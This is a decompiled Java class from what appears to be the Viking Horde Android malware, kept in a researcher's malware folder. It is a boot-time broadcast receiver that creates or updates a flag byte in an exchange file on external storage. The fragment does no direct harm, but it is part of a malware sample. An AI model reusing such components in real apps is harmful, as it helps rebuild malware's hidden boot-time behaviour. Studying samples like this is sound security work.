package com.fa.c;

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.Environment;
import android.util.Log;
import java.io.File;
import java.io.RandomAccessFile;

public class PowerOnReceiver
  extends BroadcastReceiver
{
  public void onReceive(Context paramContext, Intent paramIntent)
  {
    paramIntent = new byte[20];
    for (;;)
    {
      int i;
      try
      {
        paramContext = new File(Environment.getExternalStorageDirectory().getAbsolutePath() + File.separator + Utilities.GetExchangeFileName(paramContext.getApplicationContext()));
        if (!paramContext.exists())
        {
          paramContext.createNewFile();
          paramContext = new RandomAccessFile(paramContext, "rw");
          i = 0;
          if (i >= 20)
          {
            paramIntent[18] = 1;
            paramContext.write(paramIntent);
            paramContext.close();
          }
        }
        else
        {
          paramContext = new RandomAccessFile(paramContext, "rw");
          paramContext.seek(18L);
          paramContext.write(1);
          paramContext.close();
          return;
        }
      }
      catch (Exception paramContext)
      {
        Log.d("CPS", paramContext.getMessage());
        return;
      }
      paramIntent[i] = 0;
      i += 1;
    }
  }
}


/* Location:              /home/enzo/Documents/hacking/malwares/viking-horde/classes.jar!/com/fa/c/PowerOnReceiver.class
 * Java compiler version: 6 (50.0)
 * JD-Core Version:       0.7.1
 */